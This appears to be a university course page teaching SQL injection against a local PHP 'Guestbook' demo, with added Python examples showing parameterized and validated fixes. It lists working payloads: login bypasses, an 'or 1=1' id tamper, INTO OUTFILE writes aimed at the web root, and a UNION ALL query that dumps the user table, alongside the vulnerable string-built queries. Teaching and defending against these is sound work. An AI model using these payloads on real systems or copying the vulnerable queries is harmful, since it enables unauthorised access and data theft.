Examples for SQL Injection
For these examples, we use the "Guestbook" application (only available on my local computer).
These examples work better if magic_quotes_gpc is set to false in the php.ini config file. Otherwise, a backslash is inserted before quotes and double quotes.
Login
The login function in the source code contains the following code:
$query = "select * from user where username='$user' and password = '$pwd'";
$result = mysql_query($query , $conn);
In order to log in to the system without a password, type:
username = "' OR 'a'='a
password = (leave empty)
In order to log in to the system with username "benoist":
username = emmanuel
password = ' OR 'b' BETWEEN 'a' AND 'c
We can achieve the same goal using comments: we comment out the rest of the line.
username = emmanuel'#
password = Hello World (it does not matter anyhow)
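The login query above, rebuilt in Python over an in-memory SQLite table so it can be run offline. This is an added example, not the Guestbook application's code: the user table and its two rows are constructed here, and login_parameterized is the hardened form that binds the values as parameters instead of interpolating them into the SQL text. Only the BETWEEN payload from above is replayed, because the # comment marker is MySQL syntax that SQLite does not accept.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the Guestbook 'user' table (assumption:
    the real table has userID, username and password columns, as the query implies)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (userID INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO user (username, password) VALUES (?, ?)",
        [("emmanuel", "secret1"), ("alice", "secret2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, user, pwd):
    """Same shape as the PHP above: user input is interpolated into the SQL text,
    so a quote in the password closes the literal and the rest is parsed as SQL."""
    query = f"select * from user where username='{user}' and password = '{pwd}'"
    return conn.execute(query).fetchall()


def login_parameterized(conn, user, pwd):
    """Hardened version: the SQL text is fixed, the values travel as bound
    parameters and are compared as data, never parsed as SQL."""
    query = "select * from user where username=? and password = ?"
    return conn.execute(query, (user, pwd)).fetchall()


# The page's second payload: the quote closes the password literal and the
# OR clause is true for every row of the table.
PAYLOAD = "' OR 'b' BETWEEN 'a' AND 'c"


def demo():
    """Row counts for the same payload against both versions, plus a real login."""
    conn = make_db()
    return {
        "vulnerable_rows": len(login_vulnerable(conn, "emmanuel", PAYLOAD)),
        "hardened_rows": len(login_parameterized(conn, "emmanuel", PAYLOAD)),
        "hardened_real_login": len(login_parameterized(conn, "emmanuel", "secret1")),
    }


if __name__ == "__main__":
    print(demo())
```

With string interpolation the payload returns every user (two rows here), so the application would log in whichever row it reads first; with bound parameters the same payload is simply a password that matches nobody, while the real password still returns exactly one row.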
Selection of a page
The selection of a page is done using the following code in the PHP program:
$query = "select username, guestbook.* from user, guestbook where guestbookID=$number AND guestbook.author=userID";
$result = mysql_query($query , $conn);
To manipulate the parameter $number, just visit a message and change its ID in the query string.
Access to any information
id= 11 or 1=1
Transfer information into a file:
id= 11 or 1=1 INTO OUTFILE '/tmp/test.txt'#
This string is not valid in a URL, so we need to URL-encode it:
11+or+1%3D1+INTO++OUTFILE+%27%2Ftmp%2Ftest.txt%27%23
The file created, "/tmp/test.txt", has the same owner as the user running MySQL.
We now want to write a PHP file into our htdocs directory:
id= 11 or 1=1 INTO OUTFILE '/Applications/XAMPP/htdocs/test.php'#
which is URL-encoded as:
11+or+1%3D1+INTO++OUTFILE+%27%2FApplications%2FXAMPP%2Fhtdocs%2Ftest.php%27%23
Unfortunately (or fortunately) one cannot write into the directory "htdocs" because the user "nobody" does not have enough rights.
Union All
Use UNION ALL to view the content of another table
In the search field:
hello%' union all select * from user, guestbook where user.userID=guestbook.author group by userID#
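An added example, not the Guestbook code, covering both the page-selection query and the search field above, again in Python over an in-memory SQLite database with constructed rows. The guestbook id is checked to be a plain decimal integer before it is bound, so "11 or 1=1" never reaches the database, and the search term is bound as a LIKE parameter, so the UNION ALL text is matched literally. It goes one step beyond the page by also escaping the LIKE wildcards % and _, which parameter binding alone does not neutralise. The names make_db, is_valid_id, select_page, search and the message column are assumptions.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the Guestbook tables (assumption: the
    guestbook table has guestbookID, author and a message column)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userID INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE guestbook (guestbookID INTEGER PRIMARY KEY, author INTEGER, message TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", [(1, "emmanuel", "s1"), (2, "alice", "s2")])
    conn.executemany(
        "INSERT INTO guestbook VALUES (?, ?, ?)",
        [(10, 1, "hello from emmanuel"), (11, 2, "hello world"), (12, 2, "100% done")],
    )
    conn.commit()
    return conn


def is_valid_id(raw_id):
    """True only for a non-empty string of ASCII digits, i.e. what a message id
    in the query string is allowed to look like."""
    return isinstance(raw_id, str) and re.fullmatch(r"[0-9]+", raw_id) is not None


def select_page(conn, raw_id):
    """Page selection: reject anything that is not a plain integer ("11 or 1=1",
    "11#", "") before it goes anywhere near SQL, then bind the integer."""
    if not is_valid_id(raw_id):
        raise ValueError("guestbook id must be a decimal integer")
    query = ("select username, guestbook.* from user, guestbook "
             "where guestbookID=? AND guestbook.author=userID")
    return conn.execute(query, (int(raw_id),)).fetchall()


def search(conn, term):
    """Search field: the term is a bound LIKE parameter, so a quote cannot end the
    pattern; % and _ (and the escape character) are escaped so the user cannot
    widen the match either."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    query = ("select username, message from user, guestbook "
             "where guestbook.author=userID and message like ? escape '\\' "
             "order by guestbookID")
    return conn.execute(query, ("%" + escaped + "%",)).fetchall()


# The page's search-field payload, kept as a plain string to feed to search().
UNION_PAYLOAD = ("hello%' union all select * from user, guestbook "
                 "where user.userID=guestbook.author group by userID#")

if __name__ == "__main__":
    conn = make_db()
    print(select_page(conn, "11"))        # the single message with id 11
    print(search(conn, "hello"))          # both messages containing "hello"
    print(search(conn, UNION_PAYLOAD))    # [] : treated as text, no union runs
```

Binding parameters fixes the quoting problem but not the privilege problem shown by INTO OUTFILE: on MySQL that clause needs the FILE privilege and is further limited by secure_file_priv, so the account the web application connects with should not hold FILE, and the file system permissions that blocked the write into htdocs should stay as they are.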
Contact
Berner Fachhochschule - TI
Quellgasse 21
CH-2501 Biel/Bienne
Switzerland
Mail: emmanuel.benoist (at) bfh.ch